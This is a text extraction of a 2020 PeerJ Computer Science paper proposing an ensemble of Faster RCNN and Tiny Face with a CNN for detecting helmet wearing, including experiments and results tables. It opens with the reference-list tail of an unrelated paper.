Improving the search performance of shade by using linear population size reduction. In: CEC 2014 special session and competition on single objective real-parameter numerical optimization, vol. 3. Piscataway: IEEE, 1658–1665. Tasoulis D, Pavlidis N, Plagianakos V, Vrahatis M. 2004. Parallel differential evolution. In: Congress on evolutionary computation (CEC 2004), vol. 2. Piscataway: IEEE, 2023–2029. Zaharie D. 2002. Parameter adaptation in differential evolution by controlling the population diversity. In: Petcu D, ed. Proceedigs of the 4th international workshop on symbolic and numeric algorithms for scientific computing. Timisoara, Romania, 385–397. Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 20/20 https://peerj.com http://dx.doi.org/10.1016/j.ymeth.2013.05.012 http://dx.doi.org/10.1016/j.ydbio.2007.10.037 http://dx.doi.org/10.7717/peerj-cs.74 work_35n7f6rilnfzdevpa7noi3pla4 ---- Submitted 6 August 2020 Accepted 8 October 2020 Published 7 December 2020 Corresponding author Chengbin Peng, pengcheng- bin@nbu.edu.cn Academic editor Faizal Khan Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.311 Copyright 2020 Fan et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A deep learning-based ensemble method for helmet-wearing detection Zheming Fan1, Chengbin Peng1,2, Licun Dai1, Feng Cao1, Jianyu Qi1 and Wenyi Hua1 1 College of Information Science and Engineering, Ningbo University, Ningbo, China 2 Ningbo Institute of Industrial Technology, Chinese Academy of Sciences, Ningbo, China ABSTRACT Recently, object detection methods have developed rapidly and have been widely used in many areas. In many scenarios, helmet wearing detection is very useful, because people are required to wear helmets to protect their safety when they work in construction sites or cycle in the streets. However, for the problem of helmet wearing detection in complex scenes such as construction sites and workshops, the detection accuracy of current approaches still needs to be improved. In this work, we analyze the mechanism and performance of several detection algorithms and identify two feasible base algorithms that have complementary advantages. We use one base algorithm to detect relatively large heads and helmets. Also, we use the other base algorithm to detect relatively small heads, and we add another convolutional neural network to detect whether there is a helmet above each head. Then, we integrate these two base algorithms with an ensemble method. In this method, we first propose an approach to merge information of heads and helmets from the base algorithms, and then propose a linear function to estimate the confidence score of the identified heads and helmets. Experiments on a benchmark data set show that, our approach increases the precision and recall for base algorithms, and the mean Average Precision of our approach is 0.93, which is better than many other approaches. With GPU acceleration, our approach can achieve real-time processing on contemporary computers, which is useful in practice. Subjects Computer Vision, Data Mining and Machine Learning, Social Computing Keywords Ensemble method, Deep learning, Helmet-wearing detection, Face detection INTRODUCTION Helmets can play a vital role in protecting people. For example, many severe accidents in production and work sites and roads have been related to violations of wearing helmets. Some personnel may lack safety awareness in a working site and often do not or forget to wear helmets. 
On the road, craniocerebral injury is the leading cause of serious injury to cyclists in road traffic (World Health Organization, 2006). However, wearing a helmet reduces the risk of head injury of motorcycle riders by 69% (Liu et al., 2008), and wearing a helmet reduces the risk of head injury for cyclists by 63%–88% (Thompson, Rivara & Thompson, 1999). Monitoring helmet-wearing manually can have many limitations, as people can be fatigue and costly. Reducing manual monitoring while ensuring that relevant personnel wearing helmets all the time in the working area has become an urgent problem. How to cite this article Fan Z, Peng C, Dai L, Cao F, Qi J, Hua W. 2020. A deep learning-based ensemble method for helmet-wearing de- tection. PeerJ Comput. Sci. 6:e311 http://doi.org/10.7717/peerj-cs.311 https://peerj.com/computer-science mailto:pengchengbin@nbu.edu.cn mailto:pengchengbin@nbu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.311 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.311 Image recognition technology can reduce the workforce and material expenditures, and can significantly protect workers in many areas. Developments of computer vision algorithms and hardware (Feng et al., 2019) have paved the road for the application in helmet detection. Deep neural networks have gained much attention in image classification (Krizhevsky, Sutskever & Hinton, 2017), object recognition (Donahue et al., 2013), and image segmentation (Garcia-Garcia et al., 2017). Previous computer vision algorithms for helmet detection are usually used in relatively simple scenes. For helmet detection, Rubaiyat et al, (2016) used a histogram of oriented gradient and a support vector machine to locate persons, then used a hough transform to detect helmet for the construction worker. Li et al. (2017b) identified helmets by background subtraction. Li et al. (2017a) used ViBe background modeling algorithm and human body classification framework C4 to select people and heads, and then identified whether people wore helmets through color space transformation and color feature recognition. However, such approaches are typically not suitable for complex scenes and dynamic backgrounds, such as construction sites, workshops, and streets. Choudhury, Aggarwal & Tomar (2020) and Long, Cui & Zheng (2019) use single shot object detector algorithm to detect helmets. Siebert & Lin (2020) used RetinaNet which uses a multi-scale feature pyramid and focal loss to address the general limitation of one-stage detectors in accuracy, it works well in certain situations but its performance is highly scene dependent and influenced by light. Bo et al. (2019) use the You Only Look Once (YOLO) algorithm to accurately detect helmet wear in images with an average of four targets. However, most of these approaches are not suitable for both small and large helmets at the same time. In this work, we propose a framework to integrate two complementary deep learning algorithms to improve the ability of helmet-wearing detection in complex scenes. Our approach is able to identify regular-size and tiny-size objects at the same time for helmet- wearing detection, and can be used for detection in complex scenes. This framework can outperform traditional approaches on benchmark data. RELATED WORK The starting point of CNN is the neurocognitive machine model (Fukushima & Miyake, 1982). 
At this time, the convolution structure has appeared. The classic LeNet (LeCun et al., 1998) was proposed in 1998. However, CNN’s edge began to be overshadowed by models such as SVM (support vector machine) later. With the introduction of ReLU (Rectified Linear Units), dropout, and historic opportunities brought by GPU and big data, CNN ushered in a breakthrough in 2012: AlexNet (Krizhevsky, Sutskever & Hinton, 2017). In the following years, CNN showed explosive development, and various CNN models emerged. CNN has gradually gained the favor of scholars due to its advantages of not having to manually design features when extracting image features (Shi, Chen & Yang, 2019). Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 2/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.311 Many recent object detection approaches are based on RCNN (Region-based Convolutional Neural Networks) algorithms and YOLO algorithms (Redmon et al., 2016). RCNN is an improved algorithm based on CNN. Girshick et al. propose an epoch-making RCNN algorithm (Girshick et al., 2014) in the field of object detection. The central idea is to use a search selective method to extract some borders from the image. Then the size of the area divided by the border is normalized to the convolutional neural network input size, and then the SVM is used to identify the target. The bounding box of the target is obtained through a linear regression model. It brought deep learning and CNN to people’s sight. However, there are disadvantages such as cumbersome training steps, slow test training speed, and large space occupation. In order to improve the training and testing speed of RCNN, Fast RCNN algorithm (Girshick, 2015) was developed. It uses fewer layers while adding an ROI pooling layer to adjust the convolution area, and using softmax instead of the original SVM for classification. Compared with RCNN, Fast RCNN has improved training and testing speed. However, because the selective search method is also used to extract the borders of the region of interest, the speed of this algorithm is still not ideal for working with large data sets. Later, Faster RCNN (Ren et al., 2015) integrates feature extraction, proposal extraction, bounding box regression, classification, etc. into a network. The overall performance is far superior to CNN, and at the same time, it runs nearly much faster than CNN. Thus, Faster RCNN is commonly used in many applications. The Faster RCNN performs well for relatively large objects, but when detecting small faces or helmets, there will be a large false negative rate. Tiny Face has made certain optimizations for small face detection. It mainly optimizes face detection from three aspects: the role of scale invariance, image resolution, and contextual reasoning. Scale invariance is a fundamental property of almost all current recognition and object detection systems, but from a practical point of view, the same scale is not applicable to a sensor with a limited resolution: the difference in incentives between a 300px face and a 3px face is undeniable (Hu & Ramanan, 2017). Ramanan et al. conducted an in-depth analysis of the role of scale invariance, image resolution, and contextual reasoning. Compared with mainstream technology at the time, the error rate can be significantly reduced (Hu & Ramanan, 2017). Boosting algorithm was initially proposed as a polynomial-time algorithm, and the effectiveness has been experimentally and theoretically proved (Schapire, 1990). Afterward, Freund et al. 
improved the Boosting algorithm to obtain the Adaboost algorithm (Freund & Schapire, 1997). The principle of the algorithm is to filter out the weights from the trained weak classifiers by adjusting the sample weights and weak classifier weights. The weak classifiers with the smallest coefficients are combined into a final robust classifier. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 3/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.311 In this work, in order to identify a variety of heads and helmets in complex scenes, we propose a framework to use incorporate multiple complementary deep learning algorithms to improve the joint performance. MATERIALS & METHODS Method To address the helmet-wearing detection problem, we compare several object detection methods, such as the naive Bayes classifier, SVM, and Artificial Neural Networks classifier. Naive Bayes usually needs independent distributive premises. SVM is difficult to training for various scenes. In the case of a complex scene and huge training data, artificial neural networks are expected to have better accuracy and reliability, so we propose to use artificial neural networks, especially, convolutional neural networks, to solve this issue. To address the disadvantages raised by long-range cameras, we further improve the performance by integrating multiple complementary deep neural network models. Base algorithms Faster RCNN for detecting faces and helmet-wearing. After images are fed, Faster RCNN firstly extracts image feature maps through a group of basic conv+relu+pooling layer. Next, RPN (Region Proposal Networks) will set a large number of anchors on the scale of the original image, and randomly select 128 positive anchors and 128 negative anchors from all anchors for binary training, and use these anchors and a softmax function to initially extract positive anchors as the candidate area. At this time, the candidate regions are not accurate and require bounding boxes. For a given image I, we use A to represent the ground-truth anchors. We use AF and cF to represent the identified bounding boxes and helmet-wearing confidence scores, respectively, computed by the Faster-RCNN algorithm. If we use F to represent the algorithm, WF to represent the weight of the network, this approach can be written as follows. AF,cF =F(I,WF) (1) If we consider AF =F(I,WF)[0] and cF =F(I,WF)[1], we can use Loss(F(I,WF)[0],F(I,WF)[1],A) (2) to represent the loss function (Fukushima & Miyake, 1982) when to minimize differences between the detected anchors and the ground-truth. Thus, when we train this model, the optimization is as follows. W∗F =argminWFLoss(F(I,WF)[0],F(I,WF)[1],A) (3) Tiny Face for detecting faces. The overall idea of Tiny Face is similar to RPN in Faster RCNN, which is a one-stage detection method. The difference is that some scale specific design and multi-scale feature fusion are added, supplemented by image pyramid so that Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 4/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.311 the final detection effect for small faces is better. The training data were changed by three scales, with one-third of the probability respectively and sent to the network for training. Multiple scales could be selected to improve the accuracy rate in the prediction. 
For a given image I, we can also use $A_T$ and $c_T$ to represent the identified bounding boxes and confidence scores computed by the Tiny Face algorithm, so if we use T to represent the Tiny Face algorithm and $W_T$ to represent the corresponding weights, we have

$A_T, c_T = T(I, W_T)$    (4)

However, Tiny Face can only be used to determine whether a detection target contains a human face and cannot directly distinguish whether the target is wearing a helmet. Thus, we propose to use a CNN to overcome this disadvantage.

CNN for detecting helmet-wearing. For anchors determined by Tiny Face, we can use a CNN to detect helmets above the face. We enlarge the face area detected by Tiny Face and feed it into the CNN model for prediction. The confidence scores indicating whether there is a helmet above the face can be computed by the CNN algorithm as

$c_C = C(A_T, I, W_C)$,    (5)

where C is a function representing the forward propagation of the CNN. Here, C is a composition of two convolution layers and one fully connected layer. The loss function again aims to minimize the difference between the detected helmets and the ground truth,

$Loss(A_T, C(A_T, I, W_C), A)$.    (6)

Ensemble model detecting high and low resolution helmets

For the two lists of face anchors $A_F$ and $A_T$ detected by the base algorithms above, we merge them with the following strategy. We first initialize an empty anchor list $A_S$ and two score vectors $c_{SF}$ and $c_{SC}$. For the i-th anchor in $A_F$ and the corresponding score in $c_F$, namely $A_F[i]$ and $c_F[i]$, we first insert them into $A_S$ and $c_{SF}$ respectively. Then $A_F[i]$ is compared with all the anchors in $A_T$. If some anchors in $A_T$ have more than 60% overlapping area with $A_F[i]$, we remove these anchors from $A_T$ and remove the corresponding entries from $c_C$; we take the mean value of the removed entries of $c_C$ and insert it into $c_{SC}$. If no overlapping anchors in $A_T$ are found, we insert zero into $c_{SC}$. After all the anchors in $A_F$ are processed, the remaining anchors in $A_T$, the remaining confidence values in $c_C$, and a zero vector of the same length are inserted into $A_S$, $c_{SC}$, and $c_{SF}$, respectively. At last, we compute the covering area of each anchor in $A_S$ and store these areas in $\delta$. The merge process can also be described in pseudocode (a sketch is given below).

After the data preparation, many ensemble learning methods can be used for model integration. In this work, we consider a basic ensemble model defined as

$S(c_{SF}, c_{SC}, \delta, \alpha) = \sum_i \alpha_i h_i(c_{SF}, c_{SC}, \delta)$    (7)

where $\alpha$ is the model parameter, $\delta$ is a vector containing the areas of the corresponding anchors, and $h_i()$ is a classifier. We choose decision trees with a maximum depth of two in the experiment, and i ranges from 0 to 1000. The variable $\delta$ is used here because the two base algorithms are good at identifying relatively large and small objects respectively, and adding the covering areas of the anchors helps improve the accuracy. Thus, in the ensemble method, $A_S$ is the anchor list, and $c_S = S(c_{SF}, c_{SC}, \delta, \alpha)$ contains the corresponding confidence values about helmet-wearing. To train this model, we merge the anchor set $A_S$ and the ground-truth set A in a similar manner as when merging $A_F$ and $A_T$, and we use $\hat{c}_{SF}$, $\hat{c}_{SC}$ and $\hat{c}$ to represent the corresponding variables after merging. Zeros are filled in if the corresponding anchor does not exist before merging.
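The merge strategy above can be sketched in Python as follows. This is a reconstruction from the prose description (the 60% overlap rule, averaging of removed Tiny Face scores, and zero padding), not the authors' original pseudocode; overlap() is a hypothetical helper returning the fraction of overlapping area between two boxes.

def merge_anchors(A_F, c_F, A_T, c_C, overlap):
    """Merge Faster RCNN anchors (A_F, c_F) with Tiny Face anchors A_T and their
    CNN helmet scores c_C, producing A_S, c_SF, c_SC and the area vector delta."""
    A_T, c_C = list(A_T), list(c_C)          # work on copies that can shrink
    A_S, c_SF, c_SC = [], [], []
    for box_f, score_f in zip(A_F, c_F):
        A_S.append(box_f)
        c_SF.append(score_f)
        # Tiny Face anchors overlapping this Faster RCNN anchor by more than 60%.
        hits = [k for k, box_t in enumerate(A_T) if overlap(box_f, box_t) > 0.6]
        if hits:
            c_SC.append(sum(c_C[k] for k in hits) / len(hits))   # mean of removed scores
            for k in sorted(hits, reverse=True):                 # drop matched anchors
                del A_T[k]
                del c_C[k]
        else:
            c_SC.append(0.0)                                     # no overlap: pad with zero
    # Remaining Tiny Face anchors are appended with zero Faster RCNN scores.
    A_S.extend(A_T)
    c_SC.extend(c_C)
    c_SF.extend([0.0] * len(A_T))
    # delta holds the covering area of each merged anchor, assuming (x1, y1, x2, y2) boxes.
    delta = [(x2 - x1) * (y2 - y1) for (x1, y1, x2, y2) in A_S]
    return A_S, c_SF, c_SC, delta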
Then, the loss between the identified anchors in $A_S$ and the ground-truth anchors A is

$E(\delta, \alpha, \hat{c}_{SF}, \hat{c}_{SC}, \hat{c}) = \sum_{i=0}^{n} \big( S(\hat{c}_{SF}[i], \hat{c}_{SC}[i], \delta, \alpha) - \hat{c}[i] \big)^2$    (8)

where n is the total number of anchors after merging. The optimal value of $\alpha$ can be computed by minimizing this error,

$\alpha^* = \arg\min_{\alpha} E(\alpha, \hat{c}_{SF}, \hat{c}_{SC}, \hat{c})$.    (9)

The whole process can be described by the pseudocode of Algo. 2.

Experiments

In order to evaluate the performance of our framework, we use five criteria:

$TPR = m/n$    (10)
$FPR = l/k$    (11)
$RE = m/N$    (12)
$FNR = 1 - RE$    (13)
$PRE = m/(m+l)$    (14)

where TPR is the true positive rate, FPR is the false positive rate, FNR is the false negative rate, RE is the recall rate, PRE is the precision rate, m is the number of correct predictions by the models under the current threshold, n is the number of parts of the model detection result that are identical to the ground truth, l is the number of false predictions by the models under the current threshold, k is the number of parts of the model detection result that differ from the ground truth, and N is the number of targets that actually exist.

Figure 1. Faster RCNN detecting big faces.

To evaluate our approach, we take the publicly available benchmark data set (Safety Helmet Wearing-Dataset), containing images from construction sites, roads, workshops, and classrooms. The data set consists of a total of 7,581 images. We use five-fold cross-validation for the experiments. We randomly divide all the images into five parts; the training set, validation set, and testing set contain 3/5, 1/5, and 1/5 of the total images, respectively.

Preliminary analysis

The detection results of Faster RCNN for faces are shown in Figs. 1 and 2. From these two figures, we can see that Faster RCNN is suitable for detecting large objects but misses small ones. The detection results of Tiny Face are shown in Fig. 3. From this result, we can see that Tiny Face is good at finding small faces. To compare the differences between the two models, we used Faster RCNN and Tiny Face to test 1,000 images from the data set and counted the number of faces of different sizes detected by the two models. Figure 4 is the histogram of the real data, and Fig. 5 is the histogram of face sizes detected by Faster RCNN. Taking the number of pixels (px2) as the area measurement, a face with an area smaller than 500 px2 is defined as a small face, and a face larger than 500 px2 is defined as a large face. Because of the large area span (the smallest face is only 90 px2, while the largest face can reach 2,000,000 px2), and in order to prevent the histograms from crowding together, only faces with an area less than 2,000 px2 are shown in the figures.

Figure 2. Faster RCNN detecting small faces.
Figure 3. Tiny Face detecting small faces.
Figure 4. Histogram of real data.
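For reference, the five criteria in Eqs. (10)-(14) can be computed with a few lines of Python; the counts m, n, l, k, and N follow the definitions given above.

def evaluation_criteria(m, n, l, k, N):
    """Compute TPR, FPR, RE (recall), FNR and PRE (precision) as in Eqs. (10)-(14)."""
    TPR = m / n          # true positive rate
    FPR = l / k          # false positive rate
    RE = m / N           # recall rate
    FNR = 1 - RE         # false negative rate
    PRE = m / (m + l)    # precision rate
    return {"TPR": TPR, "FPR": FPR, "RE": RE, "FNR": FNR, "PRE": PRE}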
Figure 5. Histogram of face sizes detected by Faster RCNN.

According to the statistics, there are actually 1,568 big faces and 83 small faces. The initial Faster RCNN model can detect 1,468 big faces and 37 small faces. Under the assumption that the labels are correct, the false negative rate for big faces is 5.2%, and that for small faces is 55.5%. Obviously, the Faster RCNN model has lower accuracy for small faces. We then performed the same statistics for Tiny Face and obtained the histogram of its detection results in Fig. 6. Tiny Face can detect 1,306 large faces and 44 small faces. Its false negative rate for large faces is 16.8%, which is 11.6% higher than Faster RCNN, and its false negative rate for small faces is 47.0%, which is 8.5% lower than Faster RCNN.

Figure 6. Histogram of face sizes detected by Tiny Face.

Although these are only preliminary models (neither the models nor the amount of training has been tuned to improve accuracy), it is not difficult to see from the current data that the detection capabilities of the Faster RCNN and Tiny Face models have different focuses. Faster RCNN has a great advantage when detecting large faces, while Tiny Face's ability to detect small faces is better than Faster RCNN's. In other words, Faster RCNN has a higher true positive rate for detecting large faces and Tiny Face has a higher true positive rate for detecting small faces. The overall effect can be better if we combine the two methods.

Accuracy of base algorithms for helmet detection

Accuracy of $F(I, W_F^*)$. In this part, we evaluate the accuracy of $F(I, W_F^*)$ alone in Algo. 2. Theoretically, the more training steps the model has, the better, but in order to prevent overfitting we still need to observe the accuracy of the model under different numbers of training steps. In the beginning, we selected some images from the training data set to evaluate the model. We trained for 5,000 steps and used the model to test images from the training set, but the effect was obviously not very satisfactory. Because $F(I, W_F^*)$ is based on Faster RCNN, which has high precision but easily misses small faces, the quality of the model can be preliminarily judged by the number of detected targets; we then gradually increased the number of training steps. When the number of training steps reaches 20,000, the number of detected targets in the detection results of 1,000 test-set images stays at about 1,300. As the number of training steps increases, the number of detected targets increases slightly. When the number reaches 60,000 steps, the number of detected targets is 1,523; at this point the precision rate of the model is 87.3% and the recall rate is 85.9%. When the number of training steps reaches 70,000, the number of detected targets is close to 1,700; at this point the precision rate of the model is 81.2% and the recall rate is 86.3%.
We find that although the recall rate increases slightly, the precision rate drops considerably, so we chose the model with 60,000 training steps as the final model. See Table 1 for the accuracy of $F(I, W_F^*)$ under different numbers of training steps.

Table 1. Relationship between training steps and accuracy.

Steps     Precision rate   Recall rate
5,000     80.0%            72.4%
20,000    84.0%            82.0%
40,000    86.1%            85.1%
60,000    87.3%            85.9%
70,000    81.2%            86.3%

Regarding the scoring threshold, it is 0.5 by default, which means that when the score is lower than 0.5 the result is discarded. We successively set the threshold to 0.3, 0.4, 0.5, 0.6, and 0.7, and tested on the validation data to choose the value that works best. We found that when the threshold is 0.6, the precision rate of the test result is 87.3% and the recall rate is 85.9%, which is better than the other thresholds. After comprehensive consideration, we keep 0.6 as the threshold for the ensemble. The ROC curve on the training set is shown in Fig. 7. When training this model, in order to distinguish whether an individual is wearing a helmet, we use two labels: people wearing a helmet and people not wearing a helmet. This makes the final trained model distinguish more accurately whether the target wears a helmet.

Figure 7. ROC with respect to A.

Accuracy of $T(I, W_T^*)$. In this part, we consider the accuracy of $T(I, W_T^*)$ alone in Algo. 2. It is basically a trained Tiny Face model. We lowered the scoring threshold of Tiny Face to 0.5, requiring the Tiny Face model only to determine the location of small faces; it does not need to return an accurate score value. The precision rate of face detection was 85.6%, and the recall rate was 69.4%.

Accuracy of $C(A_T, I, W_C^*)$. In this part, we consider the accuracy of $C(A_T, I, W_C^*)$ alone in Algo. 2. The function $C(A_T, I, W_C^*)$ is basically a CNN model, which requires only one target per image, so we selected over 2,000 images from the training set, cropped the targets according to the corresponding anchor labels, and obtained 20,000 images with only one target in each image. We selected 18,000 images as training data for the CNN and the other 2,000 images as a validation set to measure the accuracy of the CNN; the cropped images are divided into two sets, people wearing helmets and people not wearing helmets. In addition, we rotated some images to obtain richer training samples. With cross-validation, we chose to use four pairs of convolution and pooling layers, in which the convolution kernels of the first and second convolution layers have size [5,5] and the convolution kernels of the third and fourth convolution layers have size [3,3]. The precision rate of the final two-class CNN reached 90.3% when tested on the CNN validation set. The ROC curve on the training set is shown in Fig. 8.

Figure 8. ROC with respect to A_T and c_C.

Accuracy of the ensemble method $S(c_{SF}, c_{SC}, \alpha^*)$. The areas under the ROC curves of Faster RCNN and of $(A_T, c_C)$ are 0.86 and 0.83, respectively. The ensemble method can further improve the accuracy of the final result.
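One way to realize the ensemble of Eq. (7), a weighted sum of depth-two decision trees fitted under the squared error of Eqs. (8) and (9), is gradient boosting over the per-anchor features (c_SF, c_SC, delta). The scikit-learn sketch below is only one plausible instantiation under these stated choices, not necessarily the authors' implementation; X holds the merged per-anchor features and y the merged ground-truth labels (the vector written as c-hat in Eq. (8)).

import numpy as np
from sklearn.ensemble import GradientBoostingRegressor

def fit_ensemble(c_SF, c_SC, delta, y):
    """Fit S(c_SF, c_SC, delta, alpha) as a sum of ~1000 depth-2 regression trees;
    the default squared-error loss matches Eq. (8)."""
    X = np.column_stack([c_SF, c_SC, delta])
    model = GradientBoostingRegressor(n_estimators=1000, max_depth=2)
    return model.fit(X, y)

def ensemble_scores(model, c_SF, c_SC, delta):
    # c_S = S(c_SF, c_SC, delta, alpha), the final helmet-wearing confidences.
    return model.predict(np.column_stack([c_SF, c_SC, delta]))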
Among the data, $c_F$ and $c_C$ are the results from the two base methods, respectively, and the area is the size of the target frame. Obviously, $c_F$ and $c_C$ can be used as the feature values of the ensemble method. We tested the trained model, and the area under its ROC curve is larger, reaching 0.90. The ROC curve on the training set is shown in Fig. 9. The ROC curve of the ensemble method clearly has the largest coverage area, which shows that the ensemble method is effective in our model.

Figure 9. ROC with respect to A_S and c_S.

Comparison of different algorithms. In this part, we demonstrate the effectiveness of our ensemble framework by combining Faster RCNN and Tiny Face+CNN, using the ROC curve and the PR curve. The ROC and PR curves are calculated from the testing results through 5-fold cross-validation, as shown in Figs. 10 and 11. From Figs. 10 and 11, we can see that the combination obtained with our framework (in green) is better than the single algorithms (in black and orange). Our framework also attains the largest area under the ROC curve (0.83) in Fig. 10 and the largest area under the PR curve (0.93), namely the mAP score. This means our framework works best on average over all possible threshold choices. Tables 2 and 3 reveal a similar phenomenon when a reasonable threshold is chosen: with a well-chosen threshold, our framework works better than the others in terms of TPR, FPR, FNR, precision, and recall.

Figure 10. Comparison with ROC.
Figure 11. Comparison with PR.

Table 2. Comparison with TPR, FPR, FNR.

Algorithm                        True positive rate   False positive rate   False negative rate
Faster RCNN                      74.7%                43.1%                 72.7%
TinyFace + CNN                   73.8%                25.8%                 51.9%
Faster RCNN + Tiny Face + CNN    75.6%                18.3%                 42.5%

Table 3. Comparison with precision and recall.

Algorithm                        Precision   Recall
Faster RCNN                      85.4%       27.3%
Tiny Face + CNN                  91.5%       48.1%
Faster RCNN + Tiny Face + CNN    92.5%       57.5%

Figure 12. Comparison with ROC for integrating Mobilenet and Tiny Face.

Our framework can also be used to integrate other complementary deep learning methods to improve their performance. As an example, we use our framework to combine Mobilenet and TinyFace+CNN, and compare the integrated results with the single algorithms. The performance is shown in Figs. 12 and 13. Similar to the previous case, the algorithm performance is generally improved. Our framework also works well when a specific threshold is chosen, as shown in Tables 4 and 5.
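The areas under the ROC and PR curves used in these comparisons can be computed directly from per-anchor confidence scores and binary ground-truth labels. The following scikit-learn sketch is illustrative only; the variable names are ours.

from sklearn.metrics import roc_auc_score, average_precision_score

def compare_algorithms(score_lists, y_true):
    """Report ROC AUC and PR AUC (average precision, the mAP-style score quoted
    in the text) for each algorithm's confidence scores on the same test anchors."""
    results = {}
    for name, scores in score_lists.items():
        results[name] = {
            "roc_auc": roc_auc_score(y_true, scores),
            "pr_auc": average_precision_score(y_true, scores),
        }
    return results

# Example (hypothetical score vectors):
# compare_algorithms({"Faster RCNN": c_F, "TinyFace+CNN": c_TC, "Ensemble": c_S}, y_true)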
Figure 13. Comparison with PR for integrating Mobilenet and Tiny Face.

Table 4. Comparison with TPR, FPR, FNR for integrating Mobilenet and Tiny Face.

Algorithm                       True positive rate   False positive rate   False negative rate
Mobilenet                       74.3%                17.4%                 32.0%
TinyFace + CNN                  73.3%                25.2%                 52.5%
Mobilenet + Tiny Face + CNN     80.0%                17.2%                 35.2%

Table 5. Comparison with precision and recall for integrating Mobilenet and Tiny Face.

Algorithm                       Precision   Recall
Mobilenet                       92.0%       69.4%
Tiny Face + CNN                 91.9%       47.7%
Mobilenet + Tiny Face + CNN     94.7%       77.7%

Through these experiments, we find that the integrated framework for two complementary models can improve the performance of the single algorithms by increasing the true positive rate, the precision rate, and the recall rate, while reducing the false positive rate and the false negative rate.

DISCUSSION

The detection accuracy of a single model is usually not satisfactory, so we use an ensemble method to integrate models and obtain better results. Considering the complementary behaviors of different algorithms, using an ensemble method for integration can effectively improve the accuracy of the detection results. For example, in our experiments the Tiny Face model with a CNN can be used to overcome the shortcomings that the Faster RCNN model has when detecting small faces. Although the proportion of small faces in the test set of this experiment is not very large, the miss rate is still one percentage point lower than that of a single model. On a test set with a large proportion of small faces, the detection accuracy of the integrated model can be improved further.

CONCLUSION

When the detection accuracy of a single deep learning model cannot meet the demands of helmet-wearing detection, we can integrate a complementary model with it to obtain better results. In addition, our framework can make single algorithms more robust to data sets from different scenarios, because it can utilize the advantages of the complementary algorithms. By analyzing a variety of object detection models, we find that it is difficult for many models to achieve high precision for helmet-wearing detection in different scenarios. Therefore, we carefully select two complementary base models and add additional modules to make them suitable for helmet-wearing detection. We ensemble the base models and build a more powerful helmet-wearing detection algorithm to further improve the detection capability. Our approach can be accelerated by GPUs and deployed on distributed computers to reduce processing time, and thus can be useful in real-world scenarios. In the future, the model can also be extended by integrating additional features or models and upgraded to mixed neural network models.

ADDITIONAL INFORMATION AND DECLARATIONS

Funding
This work was supported by the National Natural Science Foundation of China (NO. 61802372), the Natural Science Foundation of Zhejiang Province (NO. LGG20F020011), the Ningbo Science and Technology Innovation Project (NO. 2018B10080), and the Qianjiang Talent Plan (NO. QJD1702031). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

Grant Disclosures
The following grant information was disclosed by the authors:
National Natural Science Foundation of China: 61802372.
Natural Science Foundation of Zhejiang Province: LGG20F020011.
Ningbo Science and Technology Innovation Project: 2018B10080.
Qianjiang Talent Plan: QJD1702031.

Competing Interests
The authors declare there are no competing interests.
Author Contributions
• Zheming Fan and Chengbin Peng conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• Licun Dai conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
• Feng Cao, Jianyu Qi and Wenyi Hua performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.

Data Availability
The following information was supplied regarding data availability:
Code is available as a Supplemental File. The data set is available at GitHub: https://github.com/njvisionpower/Safety-Helmet-Wearing-Dataset.

Supplemental Information
Supplemental information for this article can be found online at http://dx.doi.org/10.7717/peerj-cs.311#supplemental-information.

REFERENCES
Anonymous. 2020. Safety helmet wearing-dataset. Available at https://github.com/njvisionpower/Safety-Helmet-Wearing-Dataset (accessed on 3 August 2020).
Bo Y, Huan Q, Huan X, Rong Z, Hongbin L, Kebin M, Weizhong Z, Lei Z. 2019. Helmet detection under the power construction scene based on image analysis. In: 2019 IEEE 7th international conference on computer science and network technology (ICCSNT). Piscataway: IEEE, 67–71.
Choudhury T, Aggarwal A, Tomar R. 2020. A deep learning approach to helmet detection for road safety. Journal of Scientific and Industrial Research 79(06):509–512.
Donahue J, Jia Y, Vinyals O, Hoffman J, Zhang N, Tzeng E, Darrell T. 2013. A deep convolutional activation feature for generic visual recognition. Berkeley: UC Berkeley & ICSI.
Feng X, Jiang Y, Yang X, Du M, Li X. 2019. Computer vision algorithms and hardware implementations: a survey. Integration 69:309–320 DOI 10.1016/j.vlsi.2019.07.005.
Freund Y, Schapire RE. 1997. A decision-theoretic generalization of on-line learning and an application to boosting. Journal of Computer and System Sciences 55(1):119–139 DOI 10.1006/jcss.1997.1504.
Fukushima K, Miyake S. 1982. Neocognitron: a self-organizing neural network model for a mechanism of visual pattern recognition. In: Competition and cooperation in neural nets. Berlin, Heidelberg: Springer, 267–285.
Garcia-Garcia A, Orts-Escolano S, Oprea S, Villena-Martinez V, Garcia-Rodriguez J. 2017. A review on deep learning techniques applied to semantic segmentation. ArXiv preprint. arXiv:1704.06857.
Girshick R. 2015. Fast R-CNN. In: Proceedings of the IEEE international conference on computer vision. Piscataway: IEEE, 1440–1448.
Girshick R, Donahue J, Darrell T, Malik J. 2014.
Rich feature hierarchies for accurate object detection and semantic segmentation. In: Proceedings of the IEEE conference on computer vision and pattern recognition. 580–587.
Hu P, Ramanan D. 2017. Finding tiny faces. In: Proceedings of the IEEE conference on computer vision and pattern recognition. 951–959.
Krizhevsky A, Sutskever I, Hinton GE. 2017. Imagenet classification with deep convolutional neural networks. Communications of the ACM 60(6):84–90.
LeCun Y, Bottou L, Bengio Y, Haffner P. 1998. Gradient-based learning applied to document recognition. Proceedings of the IEEE 86(11):2278–2324 DOI 10.1109/5.726791.
